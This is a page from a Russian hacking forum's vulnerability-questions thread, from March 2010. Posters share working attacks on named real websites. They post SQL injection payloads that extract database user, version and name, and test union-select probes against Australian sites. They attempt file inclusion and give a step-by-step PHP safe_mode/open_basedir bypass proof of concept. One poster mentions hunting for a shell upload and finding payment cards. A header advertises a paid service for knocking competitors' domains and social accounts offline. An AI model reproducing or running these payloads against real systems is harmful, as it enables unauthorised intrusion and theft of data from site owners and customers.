Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1220 из 1393

1220

Опции темы

Поиск в этой теме

Опции просмотра

#12191

26.03.2010, 21:26

mental2

Познающий

Регистрация: 13.08.2007

Сообщений: 37

Провел на форуме:
232729

Репутация: 1

Не подскажите, почему
http://www.asteroid.ru/user_view.phtml?2034/2/17.phtml[///...///]
Когда вставляю 4036 слешей, то они не отображаются, а когда 4037 то отображаются, да и вообще почему не пашет инклуд?

Какие могут быть причины? Из за абсолютного пути?
На счёт этого поста?
http://forum.antichat.ru/showpost.php?p=1023030&postcount=16
Где собственно последовательность?)) И если на линухе 1к символов с копейками, и на Linux 4065, то если ставить допустим 5к символов, то сработает в любом случае и там и там? или сть какие правила?

зы. Я хочу понять как это работает. На указанный сайт мне плевать.

Последний раз редактировалось mental2; 26.03.2010 в 21:32..

#12192

26.03.2010, 21:29

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Код:

http://www.asteroid.ru/user_view.phtml?2034/2/17

там и так по умолчанию нужное тебе расширение добавляется, чего ты там отрезать хочешь?

#12193

26.03.2010, 22:35

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Есть ли рабочие методы обхода safe-mode для Apache+PHP/5.2.12+Freebsd 8 ?
Если да, то какие?))

#12194

26.03.2010, 22:49

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

session.save_path safe_mode and open_basedir bypass

Код:

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem came when we use multiple ';' character and when we will
create fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php 
{
session_save_path("/humhum");
session_start();
}
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on
line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php 
{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check, that we have
used next ';' after first. Creating fake directory structure

mkdir ';a'
mkdir '../;a'

we can reduce directory level using '../' .

#12195

27.03.2010, 13:07

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Цитата:

Сообщение от Darren

Господа, помогите подобрать столбцы, немогу разобраться
http://www.orderflowers.co.il/products.php?cid=49%20%20and(1=1)

либо:

Код:

_http://www.orderflowers.co.il/products.php?cid=49+and+(1,1)=(select+*+from+(select+name_const(version(),1),name_const(version(),1))eba%20)

Duplicate column name '5.0.77'

#12196

27.03.2010, 13:57

~~Darren~~

Banned

Регистрация: 14.06.2008

Сообщений: 34

Провел на форуме:
119183

Репутация: 13

Отправить сообщение для Darren с помощью ICQ

Цитата:

Сообщение от Sc0rpi0n

Код:

http://www.orderflowers.co.il/products.php?cid=49 order by 13 --

Код:

http://www.orderflowers.co.il/products.php?cid=49 and 1 = 0 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13 --

шелл не залить, админку не нашёл, картон 2 штуки и то тестовые) хех)

#12197

27.03.2010, 14:27

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

2 pashkela: тот метод - особый случай. но меня не сработал ниразу..

#12198

27.03.2010, 17:16

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Отправить сообщение для CyberHunter с помощью ICQ

Подскажите, вот что сегодня ношел:

Код:

http://www.federationpress.com.au/journals/abstract.asp?id=144'

Я так понял, что это MS Acces. Прочитал статью о таких инъекциях - ничего не смог сделать

Вот еще такая же:

Код:

http://www.etradesman.com.au/tradesman/tradesman.asp?id=144'

Как быть с такими?

И еще хотел спросить что это такое?

Код:

http://www.startdreams.com.au/LearnAboutMoney/KB_Content.aspx?section=KB_MB&id=144'

Можно ли провести инъекцию при такой ошибке?

#12199

27.03.2010, 17:27

fletch

Новичок

Регистрация: 14.07.2009

Сообщений: 5

Провел на форуме:
29119

Репутация: 0

нет это не инъекция, нельзя

#12200

27.03.2010, 17:32

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

Провел на форуме:
3202832

Репутация: 1588

Отправить сообщение для [x60]unu с помощью ICQ

Цитата:

Сообщение от fletch

нет это не инъекция, нельзя

серьезно ?

Код:

http://www.etradesman.com.au/tradesman/tradesman.asp?id=144+union+select+1+from+news

Страница 1220 из 1393

1220

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход